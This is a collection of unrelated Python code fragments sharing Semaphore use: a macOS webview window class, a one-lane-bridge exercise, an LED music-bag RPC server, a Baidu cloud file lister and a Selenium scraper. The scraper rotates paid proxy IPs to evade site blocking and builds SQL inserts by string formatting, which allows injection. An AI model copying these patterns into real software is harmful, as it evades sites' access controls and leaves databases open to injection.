window.loaded self.confirm_close = window.confirm_close self.title = window.title self.text_select = window.text_select self.is_fullscreen = False self.hidden = window.hidden self.minimized = window.minimized rect = AppKit.NSMakeRect(0.0, 0.0, window.width, window.height) window_mask = AppKit.NSTitledWindowMask | AppKit.NSClosableWindowMask | AppKit.NSMiniaturizableWindowMask if window.resizable: window_mask = window_mask | AppKit.NSResizableWindowMask if window.frameless: window_mask = window_mask | NSFullSizeContentViewWindowMask | AppKit.NSTexturedBackgroundWindowMask # The allocated resources are retained because we would explicitly delete # this instance when its window is closed self.window = AppKit.NSWindow.alloc().\ initWithContentRect_styleMask_backing_defer_(rect, window_mask, AppKit.NSBackingStoreBuffered, False).retain() self.window.setTitle_(window.title) self.window.setBackgroundColor_( BrowserView.nscolor_from_hex(window.background_color)) self.window.setMinSize_( AppKit.NSSize(window.min_size[0], window.min_size[1])) self.window.setAnimationBehavior_( AppKit.NSWindowAnimationBehaviorDocumentWindow) BrowserView.cascade_loc = self.window.cascadeTopLeftFromPoint_( BrowserView.cascade_loc) self.webkit = BrowserView.WebKitHost.alloc().initWithFrame_( rect).retain() if window.x is not None and window.y is not None: self.move(window.x, window.y) else: self.window.center() self._browserDelegate = BrowserView.BrowserDelegate.alloc().init( ).retain() self._windowDelegate = BrowserView.WindowDelegate.alloc().init( ).retain() self.webkit.setUIDelegate_(self._browserDelegate) self.webkit.setNavigationDelegate_(self._browserDelegate) self.window.setDelegate_(self._windowDelegate) self.frameless = window.frameless if window.frameless: # Make content full size and titlebar transparent self.window.setTitlebarAppearsTransparent_(True) self.window.setTitleVisibility_(NSWindowTitleHidden) else: # Set the titlebar color (so that it does not change with the window color) self.window.contentView().superview().subviews().lastObject( ).setBackgroundColor_(AppKit.NSColor.windowBackgroundColor()) try: self.webkit.evaluateJavaScript_completionHandler_( '', lambda a, b: None) except TypeError: registerMetaDataForSelector( b'WKWebView', b'evaluateJavaScript:completionHandler:', _eval_js_metadata) config = self.webkit.configuration() config.userContentController().addScriptMessageHandler_name_( self._browserDelegate, 'browserDelegate') try: config.preferences().setValue_forKey_( Foundation.NO, 'backspaceKeyNavigationEnabled') except: pass if _debug: config.preferences().setValue_forKey_(Foundation.YES, 'developerExtrasEnabled') #config.preferences().setValue_forKey_(Foundation.YES, 'inlineMediaPlaybackRequiresPlaysInlineAttribute') #config.preferences().setValue_forKey_(Foundation.YES, 'allowsInlineMediaPlayback') #config.preferences().setValue_forKey_(Foundation.YES, 'mediaSourceEnabled') #config.preferences().setValue_forKey_(Foundation.NO, 'invisibleMediaAutoplayNotPermitted') self.js_bridge = BrowserView.JSBridge.alloc().initWithObject_(window) config.userContentController().addScriptMessageHandler_name_( self.js_bridge, 'jsBridge') if window.url: self.url = window.url self.load_url(window.url) elif window.html: self.load_html(window.html, '') else: self.load_html(default_html, '') if window.fullscreen: self.toggle_fullscreen() self.shown.set() def first_show(self): if not self.hidden: self.window.makeKeyAndOrderFront_(self.window) else: self.hidden = False if self.minimized: self.minimize() if not BrowserView.app.isRunning(): # Add the default Cocoa application menu self._add_app_menu() self._add_view_menu() BrowserView.app.activateIgnoringOtherApps_(Foundation.YES) BrowserView.app.run() def show(self): def _show(): self.window.makeKeyAndOrderFront_(self.window) AppHelper.callAfter(_show) def hide(self): def _hide(): self.window.orderOut_(self.window) AppHelper.callAfter(_hide) def destroy(self): AppHelper.callAfter(self.window.close) def set_title(self, title): def _set_title(): self.window.setTitle_(title) AppHelper.callAfter(_set_title) def toggle_fullscreen(self): def toggle(): if self.is_fullscreen: window_behaviour = 1 << 2 # NSWindowCollectionBehaviorManaged else: window_behaviour = 1 << 7 # NSWindowCollectionBehaviorFullScreenPrimary self.window.setCollectionBehavior_(window_behaviour) self.window.toggleFullScreen_(None) AppHelper.callAfter(toggle) self.is_fullscreen = not self.is_fullscreen def resize(self, width, height): def _resize(): frame = self.window.frame() # Keep the top left of the window in the same place frame.origin.y += frame.size.height frame.origin.y -= height frame.size.width = width frame.size.height = height self.window.setFrame_display_(frame, True) AppHelper.callAfter(_resize) def minimize(self): self.window.miniaturize_(self) def restore(self): self.window.deminiaturize_(self) def move(self, x, y): frame = self.window.frame() # TODO this will calculate incorrect coordinates during coordinate transfor, # if window is moved to another screen screenFrame = AppKit.NSScreen.mainScreen().frame() if screenFrame is None: raise RuntimeError('Failed to obtain screen') frame.origin.x = x frame.origin.y = screenFrame.size.height - frame.size.height - y self.window.setFrame_display_(frame, True) def get_current_url(self): def get(): self._current_url = str(self.webkit.URL()) self._current_url_semaphore.release() AppHelper.callAfter(get) self._current_url_semaphore.acquire() return None if self._current_url == 'about:blank' else self._current_url def load_url(self, url): def load(url): page_url = Foundation.NSURL.URLWithString_(BrowserView.quote(url)) req = Foundation.NSURLRequest.requestWithURL_(page_url) self.webkit.loadRequest_(req) self.loaded.clear() self.url = url AppHelper.callAfter(load, url) def load_html(self, content, base_uri): def load(content, url): url = Foundation.NSURL.URLWithString_(BrowserView.quote(url)) self.webkit.loadHTMLString_baseURL_(content, url) self.loaded.clear() AppHelper.callAfter(load, content, base_uri) def evaluate_js(self, script): def eval(): self.webkit.evaluateJavaScript_completionHandler_(script, handler) def handler(result, error): JSResult.result = None if result is None or result == 'null' else json.loads( result) JSResult.result_semaphore.release() class JSResult: result = None result_semaphore = Semaphore(0) self.loaded.wait() AppHelper.callAfter(eval) JSResult.result_semaphore.acquire() return JSResult.result def create_file_dialog(self, dialog_type, directory, allow_multiple, save_filename, file_filter, main_thread=False): def create_dialog(*args): dialog_type = args[0] if dialog_type == SAVE_DIALOG: save_filename = args[2] save_dlg = AppKit.NSSavePanel.savePanel() save_dlg.setTitle_(localization['global.saveFile']) if directory: # set initial directory save_dlg.setDirectoryURL_( Foundation.NSURL.fileURLWithPath_(directory)) if save_filename: # set file name save_dlg.setNameFieldStringValue_(save_filename) if save_dlg.runModal() == AppKit.NSFileHandlingPanelOKButton: file = save_dlg.filenames() self._file_name = tuple(file) else: self._file_name = None else: allow_multiple = args[1] open_dlg = AppKit.NSOpenPanel.openPanel() # Enable the selection of files in the dialog. open_dlg.setCanChooseFiles_(dialog_type != FOLDER_DIALOG) # Enable the selection of directories in the dialog. open_dlg.setCanChooseDirectories_(dialog_type == FOLDER_DIALOG) # Enable / disable multiple selection open_dlg.setAllowsMultipleSelection_(allow_multiple) # Set allowed file extensions if file_filter: open_dlg.setAllowedFileTypes_(file_filter[0][1]) # Add a menu to choose between multiple file filters if len(file_filter) > 1: filter_chooser = BrowserView.FileFilterChooser.alloc( ).initWithFilter_(file_filter) open_dlg.setAccessoryView_(filter_chooser) open_dlg.setAccessoryViewDisclosed_(True) if directory: # set initial directory open_dlg.setDirectoryURL_( Foundation.NSURL.fileURLWithPath_(directory)) if open_dlg.runModal() == AppKit.NSFileHandlingPanelOKButton: files = open_dlg.filenames() self._file_name = tuple(files) else: self._file_name = None if not main_thread: self._file_name_semaphore.release() if main_thread: create_dialog(dialog_type, allow_multiple, save_filename) else: AppHelper.callAfter(create_dialog, dialog_type, allow_multiple, save_filename) self._file_name_semaphore.acquire() return self._file_name def _add_app_menu(self): """ Create a default Cocoa menu that shows 'Services', 'Hide', 'Hide Others', 'Show All', and 'Quit'. Will append the application name to some menu items if it's available. """ # Set the main menu for the application mainMenu = AppKit.NSMenu.alloc().init() self.app.setMainMenu_(mainMenu) # Create an application menu and make it a submenu of the main menu mainAppMenuItem = AppKit.NSMenuItem.alloc().init() mainMenu.addItem_(mainAppMenuItem) appMenu = AppKit.NSMenu.alloc().init() mainAppMenuItem.setSubmenu_(appMenu) appMenu.addItemWithTitle_action_keyEquivalent_( self._append_app_name(localization["cocoa.menu.about"]), "orderFrontStandardAboutPanel:", "") appMenu.addItem_(AppKit.NSMenuItem.separatorItem()) # Set the 'Services' menu for the app and create an app menu item appServicesMenu = AppKit.NSMenu.alloc().init() self.app.setServicesMenu_(appServicesMenu) servicesMenuItem = appMenu.addItemWithTitle_action_keyEquivalent_( localization["cocoa.menu.services"], nil, "") servicesMenuItem.setSubmenu_(appServicesMenu) appMenu.addItem_(AppKit.NSMenuItem.separatorItem()) # Append the 'Hide', 'Hide Others', and 'Show All' menu items appMenu.addItemWithTitle_action_keyEquivalent_( self._append_app_name(localization["cocoa.menu.hide"]), "hide:", "h") hideOthersMenuItem = appMenu.addItemWithTitle_action_keyEquivalent_( localization["cocoa.menu.hideOthers"], "hideOtherApplications:", "h") hideOthersMenuItem.setKeyEquivalentModifierMask_( AppKit.NSAlternateKeyMask | AppKit.NSCommandKeyMask) appMenu.addItemWithTitle_action_keyEquivalent_( localization["cocoa.menu.showAll"], "unhideAllApplications:", "") appMenu.addItem_(AppKit.NSMenuItem.separatorItem()) # Append a 'Quit' menu item appMenu.addItemWithTitle_action_keyEquivalent_( self._append_app_name(localization["cocoa.menu.quit"]), "terminate:", "q") def _add_view_menu(self): """ Create a default View menu that shows 'Enter Full Screen'. """ mainMenu = self.app.mainMenu() # Create an View menu and make it a submenu of the main menu viewMenu = AppKit.NSMenu.alloc().init() viewMenu.setTitle_(localization["cocoa.menu.view"]) viewMenuItem = AppKit.NSMenuItem.alloc().init() viewMenuItem.setSubmenu_(viewMenu) mainMenu.addItem_(viewMenuItem) # TODO: localization of the Enter fullscreen string has no effect fullScreenMenuItem = viewMenu.addItemWithTitle_action_keyEquivalent_( localization["cocoa.menu.fullscreen"], "toggleFullScreen:", "f") fullScreenMenuItem.setKeyEquivalentModifierMask_( AppKit.NSControlKeyMask | AppKit.NSCommandKeyMask) def _append_app_name(self, val): """ Append the application name to a string if it's available. If not, the string is returned unchanged. :param str val: The string to append to :return: String with app name appended, or unchanged string :rtype: str """ if "CFBundleName" in info: val += " {}".format(info["CFBundleName"]) return val @staticmethod def nscolor_from_hex(hex_string): """ Convert given hex color to NSColor. :hex_string: Hex code of the color as #RGB or #RRGGBB """ hex_string = hex_string[1:] # Remove leading hash if len(hex_string) == 3: hex_string = ''.join([c * 2 for c in hex_string]) # 3-digit to 6-digit hex_int = int(hex_string, 16) rgb = ( (hex_int >> 16) & 0xff, # Red byte (hex_int >> 8) & 0xff, # Blue byte (hex_int) & 0xff # Green byte ) rgb = [i / 255.0 for i in rgb] # Normalize to range(0.0, 1.0) return AppKit.NSColor.colorWithSRGBRed_green_blue_alpha_( rgb[0], rgb[1], rgb[2], 1.0) @staticmethod def get_instance(attr, value): """ Return a BrowserView instance by the :value of its given :attribute, and None if no match is found. """ for i in list(BrowserView.instances.values()): try: if getattr(i, attr) == value: return i except AttributeError: break return None @staticmethod def display_confirmation_dialog(first_button, second_button, message): AppKit.NSApplication.sharedApplication() AppKit.NSRunningApplication.currentApplication().activateWithOptions_( AppKit.NSApplicationActivateIgnoringOtherApps) alert = AppKit.NSAlert.alloc().init() alert.addButtonWithTitle_(first_button) alert.addButtonWithTitle_(second_button) alert.setMessageText_(message) alert.setAlertStyle_(AppKit.NSWarningAlertStyle) if alert.runModal() == AppKit.NSAlertFirstButtonReturn: return True else: return False @staticmethod def print_webview(webview): info = AppKit.NSPrintInfo.sharedPrintInfo().copy() # default print settings used by Safari info.setHorizontalPagination_(AppKit.NSFitPagination) info.setHorizontallyCentered_(Foundation.NO) info.setVerticallyCentered_(Foundation.NO) imageableBounds = info.imageablePageBounds() paperSize = info.paperSize() if (Foundation.NSWidth(imageableBounds) > paperSize.width): imageableBounds.origin.x = 0 imageableBounds.size.width = paperSize.width if (Foundation.NSHeight(imageableBounds) > paperSize.height): imageableBounds.origin.y = 0 imageableBounds.size.height = paperSize.height info.setBottomMargin_(Foundation.NSMinY(imageableBounds)) info.setTopMargin_(paperSize.height - Foundation.NSMinY(imageableBounds) - Foundation.NSHeight(imageableBounds)) info.setLeftMargin_(Foundation.NSMinX(imageableBounds)) info.setRightMargin_(paperSize.width - Foundation.NSMinX(imageableBounds) - Foundation.NSWidth(imageableBounds)) # show the print panel print_op = webview._printOperationWithPrintInfo_(info) print_op.runOperationModalForWindow_delegate_didRunSelector_contextInfo_( webview.window(), nil, nil, nil) @staticmethod def pyobjc_method_signature(signature_str): """ Return a PyObjCMethodSignature object for given signature string. :param signature_str: A byte string containing the type encoding for the method signature :return: A method signature object, assignable to attributes like __block_signature__ :rtype: <type objc._method_signature> """ _objc_so.PyObjCMethodSignature_WithMetaData.restype = ctypes.py_object return _objc_so.PyObjCMethodSignature_WithMetaData( ctypes.create_string_buffer(signature_str), None, False) @staticmethod def quote(string): return string.replace(' ', '%20')
class OneLaneBridge(object): """ A one-lane bridge allows multiple cars to pass in either direction, but at any point in time, all cars on the bridge must be going in the same direction. Cars wishing to cross should call the cross function, once they have crossed they should call finished() """ def __init__(self): # TODO self.status = 1 # 0 for left and 1 for right. Cars' direction on bridge. self.driving_left_num = 0 self.waiting_to_left_num = 0 self.sema_left = Semaphore(0) self.driving_right_num = 0 self.waiting_to_right_num = 0 self.sema_right = Semaphore(0) # variables for debug: self.start_count = 1 self.fin_count = 1 self.start_count_mutex = Semaphore(1) self.fin_count_mutex = Semaphore(1) def cross(self, direction): """wait for permission to cross the bridge. direction should be either north (0) or south (1).""" # TODO # with lock: with self.start_count_mutex: print 'enter_cross:' + str( self.start_count), 'direction:', direction self.start_count += 1 if direction == 1: # toward right if self.status == 1: self.driving_right_num += 1 elif self.status == 0: self.waiting_to_right_num += 1 self.sema_right.acquire() else: print 'error 2' elif direction == 0: # toward left if self.status == 0: self.driving_left_num += 1 elif self.status == 1: self.waiting_to_left_num += 1 self.sema_left.acquire() else: print 'error 1' else: print 'At cross function: direction error!' def finished(self): # TODO # with lock2: if self.status == 1: if self.driving_right_num > 0: self.driving_right_num -= 1 # Next line: change else to if if self.driving_right_num == 0: # self.driving_right_num = 0 self.status = 0 for i in xrange(self.waiting_to_left_num): self.sema_left.release() self.waiting_to_left_num = 0 # elif self.driving_right_num == 0: # pass else: print 'error 3' if self.status == 0: if self.driving_left_num > 0: self.driving_left_num -= 1 # Next line: change else to if if self.driving_left_num == 0: # self.driving_left_num = 0 self.status = 1 for i in xrange(self.waiting_to_right_num): self.sema_right.release() self.waiting_to_right_num = 0 # elif self.driving_left_num == 0: # pass else: print 'error 4' with self.fin_count_mutex: print 'finish ' + str(self.fin_count) self.fin_count += 1
class WotabagManager(object): def __init__(self, config_file): yaml = YAML(typ='safe') if isinstance(config_file, IOBase): config = yaml.load(config_file) else: with open(config_file) as f: config = yaml.load(f) logging.config.dictConfig(config.get('logging', {})) self.logger = logging.getLogger('wotabag') self.rpc_host = config.get('rpc_host', '127.0.0.1') self.rpc_port = config.get('rpc_port', 60715) self._load_playlist(config.get('playlist', [])) volume = int(config.get('volume', 0)) if volume > 100: volume = 100 elif volume < 0: volume = 0 self.volume = volume self.current_track = 0 self.status = WotabagStatus.IDLE self._status_lock = Semaphore() # init LED strip self.strip = init_strip() self.strip.begin() # init playback self.player = None self.song = None self._stopped = Event() self._stopped.set() self._playback_thread = None def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): if self.status == WotabagStatus.PLAYING: self._stopped.set() if self._playback_thread: self._playback_thread.join() if self.player: self.player.terminate() def _mpv_log(self, loglevel, component, message): f = { 'fatal': self.logger.critical, 'error': self.logger.error, 'warn': self.logger.warning, 'info': self.logger.info, 'verbose': self.logger.debug, 'debug': self.logger.debug, 'trace': self.logger.debug, } if loglevel in f: f[loglevel]('[MPV] {}: {}'.format(component, message)) def _load_file(self, yaml_file): yaml = YAML(typ='safe') with open(yaml_file) as f: song = yaml.load(f) self.logger.debug('loaded {} ({})'.format(song['title'], song['filename'])) self.song = song def _load_playlist(self, playlist): yaml = YAML(typ='safe') self.playlist = [] for yaml_file in playlist: with open(yaml_file) as f: song = yaml.load(f) self.playlist.append((yaml_file, song['title'])) def _play(self): self._stop() self._stopped.clear() self._status_lock.acquire() self.status = WotabagStatus.PLAYING self._status_lock.release() self._playback_thread = Thread(target=self._wota_playback) self.logger.debug('starting wota playback thread') self._playback_thread.start() def _stop(self): self._stopped.set() if self._playback_thread: self._playback_thread.join() self._playback_thread = None self.logger.debug('joined wota playback thread') if self.player: self.player.terminate() self.player = None self.song = None for i in range(self.strip.numPixels()): self.strip.setPixelColor(i, BladeColor.NONE.value) self.strip.show() self._status_lock.acquire() self.status = WotabagStatus.IDLE self._status_lock.release() def _wota_playback(self): while self.current_track < len(self.playlist): song, _ = self.playlist[self.current_track] self._load_file(song) if self.player: self.player.terminate() self.player = MPV(vid='no', hwdec='mmal', keep_open='yes', volume=self.volume, log_handler=self._mpv_log) self.player.play(self.song['filename']) # wait for mpv to actually start playing playback_lock = Semaphore(value=0) def observer(name, val): if val is not None: playback_lock.release() self.player.observe_property('time-pos', observer) playback_lock.acquire() self.player.unobserve_property('time-pos', observer) start = time.time() ticks = 0 # drift = 0 bpm = 120 cur_colors = { 'left': BladeColor.YOSHIKO, 'center': BladeColor.YOSHIKO, 'right': BladeColor.YOSHIKO, } initial_offset = self.song.get('initial_offset', 0) if initial_offset: time.sleep((start + initial_offset / 1000) - time.time()) last_tick = time.perf_counter() # play led patterns for pattern in self.song['patterns']: if 'bpm' in pattern: bpm = pattern['bpm'] for k in ['left', 'center', 'right']: if k in pattern: if isinstance(pattern[k], list): colors = [] for c in pattern[k]: color = c.upper() if color in BladeColor.__members__: colors.append(BladeColor[color]) cur_colors[k] = tuple(colors) else: color = pattern[k].upper() if color in BladeColor.__members__: cur_colors[k] = BladeColor[color] kwargs = pattern.get('kwargs', {}) kwargs.update(cur_colors) wota = WOTA_TYPE[pattern['type']](bpm=bpm, strip=self.strip, **kwargs) count = pattern.get('count', 1) for i in range(count): for _ in range(len(wota)): if self._stopped.is_set(): return next_tick = last_tick + wota.tick_s # if i == 0 or i == count - 1: # loop = False # else: # loop = True loop = True wota.tick(loop=loop) diff = next_tick - time.perf_counter() last_tick = next_tick # drift = 0 if diff > 0: time.sleep(diff) # elif diff < 0: # drift = diff ticks += 1 with self.player._playback_cond: # wait for mpv to reach the end of the audio file or 5 seconds, # whichever comes first self.player._playback_cond.wait(5) # end of song, setup next track self.player.terminate() self.player = None for i in range(self.strip.numPixels()): self.strip.setPixelColor(i, BladeColor.NONE.value) self.strip.show() self.current_track += 1 self.current_track = 0 self._status_lock.acquire() self.status = WotabagStatus.IDLE self._status_lock.release() @public def get_playlist(self): """Return this wotabag's playlist.""" self.logger.info('[RPC] wotabag.get_playlist') return [title for _, title in self.playlist] @public def get_status(self): """Return current status.""" self.logger.info('[RPC] wotabag.get_status') result = { 'status': self.status.name, 'volume': self.volume, } if self.status == WotabagStatus.IDLE: if self.playlist: _, title = self.playlist[self.current_track] result['next_track'] = title else: result['next_track'] = None elif self.status == WotabagStatus.PLAYING: _, title = self.playlist[self.current_track] result['current_track'] = title next_track = self.current_track + 1 if next_track < len(self.playlist): _, title = self.playlist[next_track] result['next_track'] = title else: result['next_track'] = None return result @public def get_volume(self): """Return current volume.""" self.logger.info('[RPC] wotabag.get_volume') return self.volume @public def set_volume(self, volume): """Set volume.""" self.logger.info('[RPC] wotabag.set_volume {}'.format(volume)) volume = int(volume) if volume > 100: volume = 100 elif volume < 0: volume = 0 self.volume = volume if self.player: self.player.volume = self.volume return self.volume @public def get_colors(self): """Return list of available colors.""" self.logger.info('[RPC] wotabag.get_colors') colors = ['None'] + \ [x.name.capitalize() for x in aqours] + list(aqours_units.keys()) + ['Aqours Rainbow'] + \ [x.name.capitalize() for x in saint_snow] + ['Saint Snow'] + \ [x.name.capitalize() for x in muse] + list(muse_units.keys()) return colors @public def set_color(self, color): """Set all LEDs to the specified color or color sequence.""" self.logger.info('[RPC] wotabag.set_color {}'.format(color)) if color == 'Aqours Rainbow': colors = aqours_rainbow elif color in aqours_units: colors = aqours_units[color] elif color == 'Saint Snow': colors = saint_snow elif color in muse_units: colors = muse_units[color] elif color.upper() in BladeColor.__members__: colors = (BladeColor[color.upper()],) else: raise BadRequestError('Unknown color') strip = self.strip if len(colors) == 1: for i in range(strip.numPixels()): strip.setPixelColor(i, colors[0].value) strip.show() elif len(colors) <= 3: if len(colors) == 2: colors = colors + (colors[0],) for x, color in (enumerate(colors)): for y in range(9): strip.setPixelColor(pixel_index(x, y), color.value) strip.show() elif len(colors) == 9: for x in range(3): for y, color in enumerate(colors): strip.setPixelColor(pixel_index(x, y), color.value) strip.show() @public def power_off(self): """Power off the device. Note: If 'shutdown -h' fails, the returncode will be returned. If shutdown succeeds, the connection will be dropped immediately (this will appear as a returned None to a tinyrpc client). """ self.logger.info('[RPC] wotabag.power_off') # clear led's before power off otherwise they will stay turned on until # the separate led battery source is manually switched off for i in range(self.strip.numPixels()): self.strip.setPixelColor(i, BladeColor.NONE.value) self.strip.show() proc = subprocess.run(['shutdown', '-h', 'now']) return proc.returncode @public def play(self): """Start playback of the next song.""" self.logger.info('[RPC] wotabag.play') self._play() @public def play_index(self, index): """Start playback of the specified song.""" self.logger.info('[RPC] wotabag.play_index {}'.format(index)) if index >= len(self.playlist) or index < 0: raise BadRequestError('Invalid song index') self.current_track = index self._play() @public def stop(self): """Stop playback.""" self.logger.info('[RPC] wotabag.stop') self._stop() @public def test_pattern(self): """Display test color wipe patterns.""" self.logger.info('[RPC] wotabag.test_pattern') gevent.spawn_later(0, test_wipe, self.strip, clear=True)
def list_file( api: BaiduPCSApi, remotepath: str, desc: bool = False, name: bool = False, time: bool = False, size: bool = False, recursive: bool = False, sifters: List[Sifter] = [], highlight: bool = False, rapiduploadinfo_file: Optional[str] = None, user_id: Optional[int] = None, user_name: Optional[str] = None, show_size: bool = False, show_date: bool = False, show_md5: bool = False, show_absolute_path: bool = False, show_dl_link: bool = False, show_hash_link: bool = False, hash_link_protocol: str = PcsRapidUploadInfo.default_hash_link_protocol(), check_md5: bool = True, csv: bool = False, only_dl_link: bool = False, only_hash_link: bool = False, ): is_dir = api.is_dir(remotepath) if is_dir: pcs_files = api.list(remotepath, desc=desc, name=name, time=time, size=size) else: pcs_files = api.meta(remotepath) pcs_files = sift(pcs_files, sifters) if not pcs_files: return # Concurrently request rapiduploadinfo max_workers = DEFAULT_MAX_WORKERS semaphore = Semaphore(max_workers) with ThreadPoolExecutor(max_workers=max_workers) as executor: futs = {} for i in range(len(pcs_files)): if pcs_files[i].is_dir: continue semaphore.acquire() fut = executor.submit( sure_release, semaphore, _get_download_link_and_rapid_upload_info, api, pcs_files[i], show_dl_link=show_dl_link, show_hash_link=show_hash_link, check_md5=check_md5, ) futs[fut] = i for fut in as_completed(futs): i = futs[fut] e = fut.exception() if e is None: dl_link, rpinfo = fut.result() if rapiduploadinfo_file and rpinfo: save_rapid_upload_info( rapiduploadinfo_file, rpinfo.slice_md5, rpinfo.content_md5, rpinfo.content_crc32, rpinfo.content_length, remotepath=pcs_files[i].path, user_id=user_id, user_name=user_name, ) pcs_files[i] = pcs_files[i]._replace( dl_link=dl_link, rapid_upload_info=rpinfo ) if only_dl_link and dl_link: print(dl_link) if only_hash_link and rpinfo: hash_link = getattr(rpinfo, hash_link_protocol)() print(hash_link) else: logger.error( "`list_file`: `_get_download_link_and_rapid_upload_info` error: %s", e, ) if not only_dl_link and not only_hash_link: display_files( pcs_files, remotepath, sifters=sifters, highlight=highlight, show_size=show_size, show_date=show_date, show_md5=show_md5, show_absolute_path=show_absolute_path, show_dl_link=show_dl_link, show_hash_link=show_hash_link, hash_link_protocol=hash_link_protocol, csv=csv, ) if is_dir and recursive: for pcs_file in pcs_files: if pcs_file.is_dir: list_file( api, pcs_file.path, desc=desc, name=name, time=time, size=size, recursive=recursive, sifters=sifters, highlight=highlight, rapiduploadinfo_file=rapiduploadinfo_file, user_id=user_id, user_name=user_name, show_size=show_size, show_date=show_date, show_md5=show_md5, show_absolute_path=show_absolute_path, show_dl_link=show_dl_link, show_hash_link=show_hash_link, hash_link_protocol=hash_link_protocol, check_md5=check_md5, csv=csv, only_dl_link=only_dl_link, only_hash_link=only_hash_link, )
class page: def __init__(self): self.tmp_q = Queue() self.ip_q = Queue() self.sema = Semaphore(1) self.__init_localhost_q() def get_ip(self): self.sema.acquire() url = """http://ip.11jsq.com/index.php/api/entry?method=proxyServer.generate_api_url&packid=0&fa=0&fetch_key=&qty=1&time=101&pro=&city=&port=1&format=txt&ss=1&css=&dt=1&specialTxt=3&specialJson=""" r = requests.get(url) time.sleep(1) self.ip_q.put(r.text) self.sema.release() return r.text def __init_localhost_q(self, num=2): self.localhost_q = Queue() for i in range(num): self.localhost_q.put(i) def __init_tmp_q(self, arr): self.tmp_q.queue.clear() for i in arr: self.tmp_q.put(i) def __read_thread(self, f): conp = self.conp if self.localhost_q.empty(): chrome_option = webdriver.ChromeOptions() ip = self.get_ip() #ip="1.28.0.90:20455" print("本次ip %s" % ip) if re.match( "[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}:[0-9]{1,5}", ip) is None: print("ip不合法") return False chrome_option.add_argument("--proxy-server=http://%s" % (ip)) try: driver = webdriver.Chrome(chrome_options=chrome_option) driver.minimize_window() driver.set_page_load_timeout(20) except Exception as e: traceback.print_exc() driver.quit() return False else: try: print("使用本机ip") self.localhost_q.get() driver = webdriver.Chrome() driver.minimize_window() driver.set_page_load_timeout(20) except Exception as e: traceback.print_exc() driver.quit() return False while not self.tmp_q.empty(): x = self.tmp_q.get() if x is None: continue try: df = f(driver, x) self.db_write(conp, x, df) time.sleep(0.1) size = self.tmp_q.qsize() if size % 100 == 0: print("还剩 %d 页" % size) except Exception as e: traceback.print_exc() print("第 %s 页面异常" % x) self.tmp_q.put(x) driver.quit() return False driver.quit() print("线程正常退出") return True def read_thread(self, f): num = 10 flag = self.__read_thread(f) while not flag and num > 0: num -= 1 print("切换ip,本线程第%d次" % (5 - num)) print("已经消耗ip %d 个" % self.ip_q.qsize()) flag = self.__read_thread(f) def read_threads(self, f, arr, num=10): bg = time.time() ths = [] dfs = [] total = len(arr) if total <= 5: num = 1 if total != 0: if num / total > 1: num = int(total / 5) + 1 if int(total / 5) + 1 < 4 else num print("本次共 %d 个页面,共%d 个线程" % (total, num)) self.__init_tmp_q(arr) for _ in range(num): t = Thread(target=self.read_thread, args=(f, )) ths.append(t) for t in ths: t.start() for t in ths: t.join() self.__init_localhost_q() left_page = self.tmp_q.qsize() print("剩余 %d页" % (left_page)) if left_page > 0: self.read_thread(f) left_page = self.tmp_q.qsize() print("剩余 %d页" % (left_page)) ed = time.time() cost = ed - bg if cost < 100: print("耗时%d 秒" % cost) else: print("耗时%.4f 分" % (cost / 60)) def db_write(self, conp, href, page): dbtype = "postgresql" if dbtype == 'postgresql': con = psycopg2.connect(user=conp[0], password=conp[1], host=conp[2], port="5432", database=conp[3]) elif dbtype == 'mssql': con = pymssql.connect(user=conp[0], password=conp[1], host=conp[2], database=conp[3]) elif dbtype == 'oracle': con = cx_Oracle.connect("%s/%s@%s/%s" % (conp[0], conp[1], conp[2], conp[3])) else: con = MySQLdb.connect(user=conp[0], passwd=conp[1], host=conp[2], db=conp[3], charset='utf8') # con.set_character_set('utf8') # cur.execute('SET NAMES utf8;') # cur.execute('SET CHARACTER SET utf8;') # cur.execute('SET character_set_connection=utf8;') sql = """insert into %s.%s values($lmf$%s$lmf$,$lmf$%s$lmf$)""" % ( conp[4], conp[5], href, page) cur = con.cursor() cur.execute(sql) con.commit() cur.close() con.close() def db_write_many(self, conp, data): dbtype = "postgresql" if dbtype == 'postgresql': con = psycopg2.connect(user=conp[0], password=conp[1], host=conp[2], port="5432", database=conp[3]) elif dbtype == 'mssql': con = pymssql.connect(user=conp[0], password=conp[1], host=conp[2], database=conp[3]) elif dbtype == 'oracle': con = cx_Oracle.connect("%s/%s@%s/%s" % (conp[0], conp[1], conp[2], conp[3])) else: con = MySQLdb.connect(user=conp[0], passwd=conp[1], host=conp[2], db=conp[3], charset='utf8') # cur=con.cursor() # con.set_character_set('utf8') # cur.execute('SET NAMES utf8;') # cur.execute('SET CHARACTER SET utf8;') # cur.execute('SET character_set_connection=utf8;') sql = """insert into %s.%s values(href,page)""" % (conp[4], conp[5]) cur = con.cursor() cur.executemany(sql, data) con.commit() cur.close() con.close() def db_command(self, sql, conp): """db_command 仅仅到数据库""" dbtype = "postgresql" if dbtype == 'postgresql': con = psycopg2.connect(user=conp[0], password=conp[1], host=conp[2], port="5432", database=conp[3]) elif dbtype == 'mssql': con = pymssql.connect(user=conp[0], password=conp[1], host=conp[2], database=conp[3]) elif dbtype == 'oracle': con = cx_Oracle.connect("%s/%s@%s/%s" % (conp[0], conp[1], conp[2], conp[3])) else: con = MySQLdb.connect(user=conp[0], passwd=conp[1], host=conp[2], db=conp[3], charset='utf8') # con.set_character_set('utf8') # cur.execute('SET NAMES utf8;') # cur.execute('SET CHARACTER SET utf8;') # cur.execute('SET character_set_connection=utf8;') cur = con.cursor() cur.execute(sql) con.commit() cur.close() con.close() def write(self, **arg): tb = arg['tb'] conp = arg["conp"] f = arg["f"] num = arg["num"] arr = arg["arr"] sql = "create table if not exists %s.%s(href text,page text)" % ( conp[4], tb) self.db_command(sql, conp) print("创建表if不存在") conp.append(tb) print(conp) self.conp = conp self.read_threads(f=f, num=num, arr=arr) return self.tmp_q.qsize()
